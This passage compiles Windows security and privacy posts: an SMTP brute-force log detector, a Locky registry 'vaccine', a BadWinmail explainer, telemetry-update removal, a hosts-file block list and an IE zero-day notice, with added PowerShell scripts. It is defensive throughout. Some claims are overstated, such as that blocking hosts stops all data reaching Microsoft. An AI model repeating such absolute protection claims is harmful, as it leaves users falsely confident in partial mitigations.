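            Failures  = $events.Count
            Mailboxes = (@($events.User) | Sort-Object -Unique) -join ', '
            FirstSeen = $events[0].Time
            LastSeen  = $events[-1].Time
            Block     = $block
        }
    }
}

# With the constructed sample, 192.0.2.10 (5 failures in under a minute) is
# flagged for blocking and 198.51.100.7 (2 failures, 90 minutes apart) is not.
Get-SmtpAuthBruteForce -Lines $sampleLog | Format-Table -AutoSize
```

To run it over a real log, replace `$sampleLog` with `Get-Content -Path <logfile>`; the threshold and window are the two knobs worth tuning so that a user who mistypes a password a few times is not blocked alongside a scanner that cycles through mailboxes.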

Locky: the solution to protect yourself from it

First seen on: http://korben.info/locky-solution-sen-proteger.html

The quickest is to switch your whole OS to Russian to vaccinate it, but I will instead summarise the second solution, both quick and practical when you don't speak a word of Putinese. Note that it is only effective against the current versions of Locky. Nothing guarantees that a later version of Locky won't work around the problem.

Since Locky tries to create the key HKCU\Software\Locky in the registry (regedit), just create it before it does...

[Screenshot 2016-03-23 at 15:37:19]

and deny all access rights on it:

[Screenshot 2016-03-23 at 15:38:22]

And there you go! When it launches on your system, Locky will crash like the Mir station in Paco's garden. The other solutions proposed by Lexsi are a bit more complex, but really interesting. I invite you to read them, if only for your general knowledge.

Thanks to Olivier for sharing.
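The two manual registry steps described above can be scripted. The block below is an added example, not code from korben.info or Lexsi: it creates the HKCU\Software\Locky key named in the post, denies Everyone all access on it, and then verifies that a write to the key is refused, which is the condition that makes the malware's key creation fail. It assumes you run it as the user whose profile you want to protect (the key lives under HKCU) and that you remain the key's owner, so you can later remove the deny rule with Set-Acl.

```powershell
# Added example (not from korben.info or Lexsi): script the "create the key,
# then deny all access on it" mitigation from the post. Run as the user whose
# HKCU hive you are protecting.
$keyPath = 'HKCU:\Software\Locky'   # key name taken from the post

# Step 1: create the key before the malware can.
if (-not (Test-Path -Path $keyPath)) {
    New-Item -Path $keyPath -Force | Out-Null
}

# Step 2: deny Everyone full control on the key and its subkeys. Deny ACEs are
# evaluated before allow ACEs, so this wins over anything inherited from HKCU.
$acl = Get-Acl -Path $keyPath
$acl.SetAccessRuleProtection($true, $false)   # stop inheriting the permissive default ACL
$deny = New-Object System.Security.AccessControl.RegistryAccessRule(
    'Everyone',
    [System.Security.AccessControl.RegistryRights]::FullControl,
    [System.Security.AccessControl.InheritanceFlags]::ContainerInherit,
    [System.Security.AccessControl.PropagationFlags]::None,
    [System.Security.AccessControl.AccessControlType]::Deny
)
$acl.AddAccessRule($deny)
Set-Acl -Path $keyPath -AclObject $acl

# Step 3: prove the key is now unwritable. The owner keeps implicit rights to
# read and change the ACL, but ordinary reads and writes are refused.
try {
    New-ItemProperty -Path $keyPath -Name 'probe' -Value 1 -ErrorAction Stop | Out-Null
    Write-Warning "Write to $keyPath succeeded; the deny ACE was not applied."
} catch {
    Write-Output "OK: $keyPath exists and writes to it are denied."
}
```

As the post itself notes, this only helps against samples that look for exactly this key; treat it as a cheap extra tripwire next to patching, mail filtering and offline backups, not as a substitute for them.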

How can your PC be infected by a single unread e-mail?

We keep telling you: never click on suspicious links, never open files from unknown sources and always delete e-mails from senders you don't know. Even though all this advice is good, it will be of no use to you if you use Outlook, because it won't protect you from the BadWinmail vulnerability. You don't need to click on or open anything infected. You receive an e-mail, and that's it. In fact, you don't even need to open the mail.

How is that possible?

If you know Microsoft Office, you probably know that objects can be embedded in MS Office files. Of course, not just any object, but the list is fairly long. This is called OLE (Object Linking and Embedding) technology.

In fact, this technology works not only with DOC, XLS and so on, but also with Outlook. And the list of embeddable objects contains, in addition to the generic MS Office formats, nice things like Adobe Flash projects.

Do you know why cybercriminals love Flash so much? Because Flash has a lot of vulnerabilities. Some of these are zero-day bugs, meaning they are not patched. These vulnerabilities can be exploited to do things your PC will certainly not appreciate.

It's a well-known problem, and to fight it many developers use the same simple method: they only allow Flash content to run in their software (browsers, for example) inside what are called "sandboxes". Malicious code can do whatever it wants inside these sandboxes, even launch a cyber-apocalypse!

The idea is that it cannot escape the sandbox and therefore cannot affect anything outside it, so your files are not corrupted. At least that is how the method is designed; sometimes it doesn't work, but that's another story. The case at hand has nothing to do with that.

Waiting to find out what Outlook's vulnerability is? Here we go! In fact, Outlook does not use this kind of sandbox for potentially dangerous objects and runs everything in normal mode. This means the malicious code in embedded objects can act like any other software installed on your PC.

And that's not all! Outlook is so obliging that it opens the most recent e-mail before you do! So if a malicious e-mail carrying a BadWinmail payload is the last e-mail to arrive in your inbox, it is executed immediately when you start Outlook.

Security researcher Haifei Li, who discovered the bug, created proofs of concept of a possible attack exploiting the vulnerability, which he named BadWinmail. He describes it in surprisingly simple words in his research.

He even made this relatively short video that explains the core idea of how this vulnerability works perfectly.

To understand how harmful this can be, imagine a criminal who, instead of opening the harmless Calculator application, runs ransomware on your PC.

The good news is that Haifei Li reported the bug to Microsoft, and the company fixed the problem on 8 December. The bad news is that people who are not in the habit of updating their software regularly still have this vulnerability. And some of them will keep it for weeks, months or even years.

Now that the report has been published for the general public, many cybercriminals will try to use this vulnerability to infect thousands, even millions of PCs. If you ever wondered why it is so important to always update your software immediately and to use security software, I think you now have the answer.

Source: https://blog.kaspersky.fr/badwinmail/5087/

Turn off Windows 10’s Keylogger

Did you know? Microsoft has the power to track every single word you type or say to its digital assistant Cortana while using its newest operating system, Windows 10.
Last fall, we reported on a keylogger that Microsoft openly put into its Windows 10 Technical Preview, saying the company ‘may collect voice information’ as well as ‘typed characters.’
It was thought that the company would include the keylogger only in the Technical Preview of Windows 10, just for testing purposes. But that thought was wrong!
The keylogger made its way into the Windows 10 public release, which Microsoft offers for free and which therefore gained millions of adopters in just a few days after its first roll-out back in July – but the free upgrade is not always free.
Yes, besides various privacy issues, there is a software component that tracks your inputs via your keyboard, voice, screen, mouse, and stylus; however, it is a bit more complicated than you might think.

Windows 10’s Keylogger is More than Just a Keylogger

The component is not actually a keylogger in the malware sense.
It is more than that, as Microsoft openly states:

“When you interact with your Windows device by speaking, [handwriting], or typing, Microsoft collects speech, inking, and typing information – including information about your Calendar and People [contacts]”

If that gives you the creeps, there is no need to worry, because the good news is that you can turn off this keylogger.

Here’s How You can Turn Off the Keylogger

  • Click on the Start Menu, then open Settings.
  • Click on Privacy settings, which you’ll find in the very last row of the menu.
  • Once you are in the Privacy menu, click on General
  • Under ‘Send Microsoft info about how I write to help us improve typing and writing in the future’, set the switch to Off.
  • Now move ahead to the ‘Speech, Inking and Typing’ menu and click Stop getting to know me. This will help you turn off the speech tracking through dictation or Cortana.

Due to several privacy issues built into Windows 10, Microsoft has gained a bad reputation.

First seen on : http://thehackernews.com/2015/09/windows10-keylogger-security.html

Removing Windows 7 and 8 tracking

Here is the detail of the patches to remove, right here, right now:

KB3068708 This update introduces the Diagnostics and Telemetry tracking service to existing devices. By applying this service, you can add benefits from the latest version of Windows to systems that have not yet upgraded. The update also supports applications that are subscribed to Visual Studio Application Insights.

KB3022345 (replaced by KB3068708) This update introduces the Diagnostics and Telemetry tracking service to in-market devices. By applying this service, you can add benefits from the latest version of Windows to systems that have not yet been upgraded. The update also supports applications that are subscribed to Visual Studio Application Insights.

KB3075249 This update adds telemetry points to the User Account Control (UAC) feature to collect information on elevations that come from low integrity levels.

KB3080149 This package updates the Diagnostics and Telemetry tracking service to existing devices. This service provides benefits from the latest version of Windows to systems that have not yet upgraded. The update also supports applications that are subscribed to Visual Studio Application Insights.

To uninstall them, launch a command prompt as Administrator and enter the following commands:

  • wusa /uninstall /kb:3068708 /quiet /norestart
  • wusa /uninstall /kb:3022345 /quiet /norestart
  • wusa /uninstall /kb:3075249 /quiet /norestart
  • wusa /uninstall /kb:3080149 /quiet /norestart

To block them permanently, go to the list of updates in Windows Update and right-click / hide the update.
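The uninstall-and-hide procedure above as one script, so it can be run on several machines and verified afterwards. This is an added example, not code from the original post or from korben.info. It assumes the four KB numbers listed above, an elevated PowerShell session, and the Windows Update Agent COM API (Microsoft.Update.Session), which is a standard Windows component; hiding through that API is the scripted equivalent of the right-click / hide step.

```powershell
# Added example (not from the original post): uninstall the telemetry updates
# listed above and hide them so Windows Update does not offer them again.
# Run from an elevated PowerShell. KB numbers are the ones named in the post.

$kbs = @('3068708', '3022345', '3075249', '3080149')

# 1. Uninstall only the updates that are actually present. Get-HotFix lists
#    installed updates by id ("KB3068708"), so strip the prefix for comparison.
$installed = Get-HotFix | ForEach-Object { $_.HotFixID -replace '^KB', '' }
foreach ($kb in $kbs) {
    if ($installed -contains $kb) {
        Write-Host "Uninstalling KB$kb"
        Start-Process -FilePath 'wusa.exe' `
            -ArgumentList "/uninstall /kb:$kb /quiet /norestart" `
            -Wait -NoNewWindow
    } else {
        Write-Host "KB$kb is not installed, skipping"
    }
}

# 2. Hide the same updates so they are no longer offered. This uses the
#    Windows Update Agent COM API; IsHidden is the flag the GUI's
#    "Hide update" action sets.
$session  = New-Object -ComObject 'Microsoft.Update.Session'
$searcher = $session.CreateUpdateSearcher()
# Only updates that are offered but not installed and not already hidden.
$result   = $searcher.Search('IsInstalled=0 and IsHidden=0')
foreach ($update in $result.Updates) {
    foreach ($id in $update.KBArticleIDs) {
        if ($kbs -contains $id) {
            Write-Host "Hiding KB$id ($($update.Title))"
            $update.IsHidden = $true
        }
    }
}

# 3. Report any of the four that are still installed, for verification
#    after the reboot that wusa deferred with /norestart.
Get-HotFix |
    Where-Object { $kbs -contains ($_.HotFixID -replace '^KB', '') } |
    Select-Object HotFixID, InstalledOn
```

The hide step only affects updates that Windows Update is currently offering, which it may not do until the next scan after the uninstall and reboot; rerunning the script once more at that point is harmless, because the uninstall loop skips updates that are already gone.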

Done.

First seen on http://korben.info/windows-7-et-8-le-tracking-vous-concerne-aussi.html

Blocking Windows spying

In c:\Windows\System32\drivers\etc\

Open the hosts file as administrator with Notepad and add all these lines:

0.0.0.0 a-0001.a-msedge.net
0.0.0.0 a-0002.a-msedge.net
0.0.0.0 a-0003.a-msedge.net
0.0.0.0 a-0004.a-msedge.net
0.0.0.0 a-0005.a-msedge.net
0.0.0.0 a-0006.a-msedge.net
0.0.0.0 a-0007.a-msedge.net
0.0.0.0 a-0008.a-msedge.net
0.0.0.0 a-0009.a-msedge.net
0.0.0.0 a-msedge.net
0.0.0.0 a.ads1.msn.com
0.0.0.0 a.ads2.msads.net
0.0.0.0 a.ads2.msn.com
0.0.0.0 a.rad.msn.com
0.0.0.0 ac3.msn.com
0.0.0.0 ad.doubleclick.net
0.0.0.0 adnexus.net
0.0.0.0 adnxs.com
0.0.0.0 ads.msn.com
0.0.0.0 ads1.msads.net
0.0.0.0 ads1.msn.com
0.0.0.0 aidps.atdmt.com
0.0.0.0 aka-cdn-ns.adtech.de
0.0.0.0 az361816.vo.msecnd.net
0.0.0.0 az512334.vo.msecnd.net
0.0.0.0 b.ads1.msn.com
0.0.0.0 b.ads2.msads.net
0.0.0.0 b.rad.msn.com
0.0.0.0 bs.serving-sys.com
0.0.0.0 c.atdmt.com
0.0.0.0 c.msn.com
0.0.0.0 cdn.atdmt.com
0.0.0.0 cds26.ams9.msecn.net
0.0.0.0 choice.microsoft.com
0.0.0.0 choice.microsoft.com.nsatc.net
0.0.0.0 compatexchange.cloudapp.net
0.0.0.0 corp.sts.microsoft.com
0.0.0.0 corpext.msitadfs.glbdns2.microsoft.com
0.0.0.0 cs1.wpc.v0cdn.net
0.0.0.0 db3aqu.atdmt.com
0.0.0.0 df.telemetry.microsoft.com
0.0.0.0 diagnostics.support.microsoft.com
0.0.0.0 ec.atdmt.com
0.0.0.0 feedback.microsoft-hohm.com
0.0.0.0 feedback.search.microsoft.com
0.0.0.0 feedback.windows.com
0.0.0.0 flex.msn.com
0.0.0.0 g.msn.com
0.0.0.0 h1.msn.com
0.0.0.0 i1.services.social.microsoft.com
0.0.0.0 i1.services.social.microsoft.com.nsatc.net
0.0.0.0 lb1.www.ms.akadns.net
0.0.0.0 live.rads.msn.com
0.0.0.0 m.adnxs.com
0.0.0.0 msedge.net
0.0.0.0 msftncsi.com
0.0.0.0 msnbot-65-55-108-23.search.msn.com
0.0.0.0 msntest.serving-sys.com
0.0.0.0 oca.telemetry.microsoft.com
0.0.0.0 oca.telemetry.microsoft.com.nsatc.net
0.0.0.0 pre.footprintpredict.com
0.0.0.0 preview.msn.com
0.0.0.0 rad.live.com
0.0.0.0 rad.msn.com
0.0.0.0 redir.metaservices.microsoft.com
0.0.0.0 schemas.microsoft.akadns.net
0.0.0.0 secure.adnxs.com
0.0.0.0 secure.flashtalking.com
0.0.0.0 settings-sandbox.data.microsoft.com
0.0.0.0 settings-win.data.microsoft.com
0.0.0.0 sls.update.microsoft.com.akadns.net
0.0.0.0 sqm.df.telemetry.microsoft.com
0.0.0.0 sqm.telemetry.microsoft.com
0.0.0.0 sqm.telemetry.microsoft.com.nsatc.net
0.0.0.0 static.2mdn.net
0.0.0.0 statsfe1.ws.microsoft.com
0.0.0.0 statsfe2.ws.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com.nsatc.net
0.0.0.0 telemetry.appex.bing.net
0.0.0.0 telemetry.microsoft.com
0.0.0.0 telemetry.urs.microsoft.com
0.0.0.0 vortex-bn2.metron.live.com.nsatc.net
0.0.0.0 vortex-cy2.metron.live.com.nsatc.net
0.0.0.0 vortex-sandbox.data.microsoft.com
0.0.0.0 vortex-win.data.microsoft.com
0.0.0.0 vortex.data.microsoft.com
0.0.0.0 watson.live.com
0.0.0.0 www.msftncsi.com
0.0.0.0 ssw.live.com
0.0.0.0 fe2.update.microsoft.com.akadns.net
0.0.0.0 reports.wes.df.telemetry.microsoft.com
0.0.0.0 s0.2mdn.net
0.0.0.0 services.wes.df.telemetry.microsoft.com
0.0.0.0 statsfe2.update.microsoft.com.akadns.net
0.0.0.0 survey.watson.microsoft.com
0.0.0.0 view.atdmt.com
0.0.0.0 watson.microsoft.com
0.0.0.0 watson.ppe.telemetry.microsoft.com
0.0.0.0 watson.telemetry.microsoft.com
0.0.0.0 watson.telemetry.microsoft.com.nsatc.net
0.0.0.0 wes.df.telemetry.microsoft.com
0.0.0.0 ui.skype.com
0.0.0.0 pricelist.skype.com
0.0.0.0 apps.skype.com
0.0.0.0 m.hotmail.com
0.0.0.0 s.gateway.messenger.live.com

Reboot, and that's it: no more info will go to Microsoft, TSA of the NSA.
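The hosts-file step above done with a script instead of Notepad, so that it can be repeated without creating duplicate entries and undone from a backup. This is an added example, not code from the original post or from e-maxx.eu. It assumes an elevated PowerShell session and the standard hosts path; the $BlockList here-string holds a handful of entries taken from the list above as a sample, and the full list is meant to be pasted in its place.

```powershell
# Added example (not from the original post): append the block list to the
# hosts file idempotently, keep a backup, and apply the change without a reboot.
# Run from an elevated PowerShell.

$HostsPath = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
$Marker    = '# --- telemetry block list (added by script) ---'

# Sample subset of the post's list; replace with the complete list.
$BlockList = @'
0.0.0.0 a-msedge.net
0.0.0.0 telemetry.microsoft.com
0.0.0.0 vortex.data.microsoft.com
0.0.0.0 watson.telemetry.microsoft.com
0.0.0.0 settings-win.data.microsoft.com
'@

# Hostnames already mapped in the hosts file, whatever address they point to.
# Comment lines are skipped; names are compared case-insensitively.
$existing = @()
foreach ($line in Get-Content $HostsPath) {
    if ($line -match '^\s*[0-9a-fA-F:.]+\s+(\S+)') {
        $existing += $Matches[1].ToLower()
    }
}

# Keep only block-list entries whose hostname is not already present.
$toAdd = @()
foreach ($line in ($BlockList -split "`r?`n")) {
    if ($line -match '^\s*0\.0\.0\.0\s+(\S+)\s*$') {
        $name = $Matches[1].ToLower()
        if ($existing -notcontains $name) { $toAdd += "0.0.0.0 $name" }
    }
}

if ($toAdd.Count -eq 0) {
    Write-Host 'All block-list entries are already present; nothing to do.'
} else {
    # Timestamped backup beside the original, then append under a marker so
    # the added block is easy to find and remove later. The leading empty
    # string guarantees a line break even if the file lacks a final newline.
    $stamp  = Get-Date -Format 'yyyyMMdd-HHmmss'
    $backup = "$HostsPath.$stamp.bak"
    Copy-Item -Path $HostsPath -Destination $backup
    Add-Content -Path $HostsPath -Value (@('', $Marker) + $toAdd) -Encoding ASCII
    Write-Host "Added $($toAdd.Count) entries; backup at $backup"
}

# Flush the resolver cache so the new mappings take effect immediately.
ipconfig /flushdns | Out-Null

# Verify through the system resolver (which honours the hosts file):
# a blocked name should now come back as 0.0.0.0.
$check = 'telemetry.microsoft.com'
$addrs = [System.Net.Dns]::GetHostAddresses($check) |
    ForEach-Object { $_.IPAddressToString }
Write-Host "$check resolves to: $($addrs -join ', ')"
```

Two caveats a practitioner should keep in mind: a hosts-file entry only stops name lookups, so software that connects to a hard-coded IP address is unaffected, and several names in the list are Windows Update endpoints (the sls.update, fe2.update and statsfe2.update entries), so blocking them can stop updates from being found or installed. The verification step uses System.Net.Dns rather than Resolve-DnsName, because the latter queries DNS directly and does not consult the hosts file.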

 

First seen on : http://e-maxx.eu/bloquer-lespionnage-de-windows/

Microsoft pushes Emergency Patch for Zero-Day Internet Explorer Flaw Tuesday

It’s time to patch your Internet Explorer immediately, once again!
Microsoft has issued an emergency out-of-band patch for all supported versions of the Internet Explorer browser to fix a critical security flaw that hackers are actively exploiting to hijack control of targeted computers.
The zero-day flaw (assigned CVE-2015-2502) is a remote code execution vulnerability that could be exploited when a user visits a booby-trapped website or opens a malicious email on an affected machine.
The security bug resides in the way Internet Explorer handles objects in memory. If successfully exploited, a hacker could gain the same privileges as the current user.
Therefore, users running administrator accounts on their machines, as well as systems where IE is frequently used, like workstations or terminal servers, are particularly at risk from this vulnerability.

Critical Zero-Day Vulnerability

“An attacker who successfully exploited this vulnerability could take complete control of an affected system,” Microsoft officials wrote in an advisory posted Tuesday. An attacker could then:
  • Install malicious programs
  • View, Change, or Delete data
  • Create new accounts with full user rights
  • Many more…
In simple words, this zero-day vulnerability could allow an attacker to take over the affected Windows machine. According to the company, the flaw has been publicly exploited.

Affected Software

The zero-day flaw affects all supported versions of Microsoft’s Internet Explorer, from IE7 to IE11, which runs on the recently released Windows 10. However, Microsoft’s new Edge browser is not affected.
The vulnerability receives Microsoft’s top severity rating of ‘Critical’ for all desktop versions of Windows. The company credited its security engineer Clement Lecigne with reporting the bug.
Users and administrators are advised to install the update as soon as possible. Windows users may also get some protection from the Enhanced Mitigation Experience Toolkit (EMET), which helps prevent vulnerabilities in software from being successfully exploited.